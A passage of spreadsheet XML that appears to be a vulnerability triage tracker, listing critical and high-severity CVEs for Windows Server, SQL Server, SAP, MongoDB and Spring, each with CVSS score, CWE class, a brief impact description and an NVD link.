      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72979</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73009</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73010</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73025</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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0" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>npm:@sap/cds-mtxs</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>1.18.4, 2.7.7, 3.9.7, 4.0.3</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the SellerAuthorizeAspect component of springboot-project v1.0.0 allows unauthenticated attackers to access all seller management interfaces and list all products/orders, put products on/off sale, finish/cancel orders, and modify categories without authentication.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>SAP GUI for Java does not correctly enforce the trust level policy for certain functions invoked from a connected backend system. A low-privileged attacker could exploit this weakness by manipulating a connected backend system to trigger affected functionality. This could allow arbitrary command execution on the victim's machine, leading to a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
